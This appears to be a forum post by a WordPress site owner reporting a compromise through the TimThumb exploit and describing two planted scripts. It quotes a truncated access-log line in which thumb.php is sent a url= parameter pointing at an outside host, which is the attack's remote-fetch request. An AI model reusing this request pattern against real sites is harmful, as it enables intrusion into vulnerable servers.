Well, I - like many other it seems - got hacked via the TimThumb exploit.

I found 2 scripts (eventually) in my themes includes/temp dir.

Code:
83.103.119.239 - - [21/Feb/2012:20:49:22 +1000] "GET /wp-content/themes/widescreen/includes/temp/thumb.php?url=http://www.ookra.com/wp-content/themes/
...